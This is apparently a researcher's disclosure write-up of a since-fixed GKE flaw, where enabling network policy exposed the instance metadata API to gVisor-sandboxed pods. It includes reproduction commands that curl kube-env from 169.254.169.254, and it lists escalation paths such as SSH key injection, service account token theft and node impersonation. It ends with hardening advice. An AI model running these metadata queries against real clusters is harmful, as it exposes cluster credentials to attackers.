Escaping GKE gVisor sandboxing using metadata
Introduction
GKE is a Google Cloud service that offers a managed Kubernetes cluster, the nodes of the clusters are running on Google Cloud VM instances, the control plane and network is fully managed by GKE.
GKE offers a sandboxing feature (https://cloud.google.com/kubernetes-engine/docs/concepts/sandbox-pods), based on gVisor (https://gvisor.dev/docs/) it protects the host kernel from untrusted code. This sandboxing offers a very good isolation and allow SaaS business to execute unknown code submitted by their users.
I tried to use this feature to run isolated workloads and found that the isolation was not entirely effective and that the access to the metadata API was possible under certain conditions.
Network isolation using network policy
By default, in a Kubernetes cluster all pods are able to communicate, GKE recommends to use Network Policy to restrict the network traffic between pods (https://cloud.google.com/kubernetes-engine/docs/how-to/hardening-your-cluster#restrict_with_network_policy).
When running untrusted code, it is a good practice to isolate your clients from each other and from your own services.
With this feature, it is easy to define a policy and attach it to a group of pods and restrict the network access for theses pods.
Sandbox metadata protection
Google Cloud team documents how to harden the workload isolation using GKE sandbox (https://cloud.google.com/kubernetes-engine/docs/how-to/sandbox-pods#sandboxed-application), and gives some hints on how to configure and test the access to the metadata.
To validate that the filtering is properly enabled, you can launch a new pod and run the following command:
curl -s "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env" -H "Metadata-Flavor: Google"
This command is failing as described in the documentation because there is filtering denying the access to the metadata API.
By default the instance metadata API server is not supposed to be accessible from any sandboxed pod.
Bug found
When testing the network isolation for untrusted pods, I tried to configure the network policy on the cluster and applied some network filtering rules for the pods that I wanted to isolate.
After more testing, I found out that I was able to query the metadata API, it appears that the network filtering applied for the gVisor sandboxed pod by the GKE team was entirely disabled when the network policy was activated.
Since this sandboxing feature is supposed to run untrusted code, this would give an attacker access to sensitive informations about the node, project and Kubernetes cluster.
The bug was reported to the VRP team and quickly fixed, I was able to mitigate this by manually filtering the 169.254.169.254
IP in the network policy applied to theses pods.
How to reproduce
You can follow the steps here : https://cloud.google.com/kubernetes-engine/docs/how-to/sandbox-pods
- Create a new cluster with network policy enabled
gcloud container clusters create cluster-name --enable-network-policy
- Create a new gVisor pool
gcloud container node-pools create gvisor \
--cluster=cluster-1 \
--node-version=1.16.13-gke.401 \
--machine-type=e2-standard-2 \
--image-type=cos_containerd \
--sandbox type=gvisor --zone europe-west1-c
- Apply the test configuration from the documentation
# sandbox-metadata-test.yaml
apiVersion: apps/v1
kind: Deployment
metadata:
name: fedora
labels:
app: fedora
spec:
replicas: 1
selector:
matchLabels:
app: fedora
template:
metadata:
labels:
app: fedora
spec:
runtimeClassName: gvisor
containers:
- name: fedora
image: fedora
command: ['/bin/sleep', '10000']
- Launch a shell
kubectl exec -it pod-name /bin/sh
- Enjoy full access on the metadata API
curl "http://169.254.169.254/computeMetadata/v1/instance/attributes/kube-env" -H "Metadata-Flavor: Google"
...
ALLOCATE_NODE_CIDRS: "true"
API_SERVER_TEST_LOG_LEVEL: --v=3
...
Going deeper
With this metadata exposure bug, an attacker may gain access to sensitive information about the node, project and Kubernetes cluster.
Depending of the configuration, this could lead to:
- read project id
- read public ssh keys
- get node information (name, ip, ...)
- add his own ssh key and gain root access on the node
- get Kubernetes configuration and certificate
- access the Kubernetes cluster
- impersonate a Kubernetes node
- retrieve an service account token
- access / create / edit / delete project resources
Better isolation of untrusted code in GKE
Even when the isolation is properly working you have many ways to protect yourself against this kind of metadata exposure.
A few recommandation for running untrusted code in GKE:
- Always double check that the network policy is properly applied
- Filter out all internal ranges, whitelist only the required
- gVisor is fine but may be tricky to configure in Kubernetes, double check using
dmesg
if you are running inside the sandbox - Do not use default identities for instance identity
- You can use multiple projects to isolate workload / clients
- Do not use cluster dns
- Create specific node pool for untrusted code
- Use workload identity https://cloud.google.com/kubernetes-engine/docs/how-to/workload-identity
- Use metadata concealment https://cloud.google.com/kubernetes-engine/docs/how-to/protecting-cluster-metadata#concealment
- Use shielded GKE nodes https://cloud.google.com/kubernetes-engine/docs/how-to/shielded-gke-nodes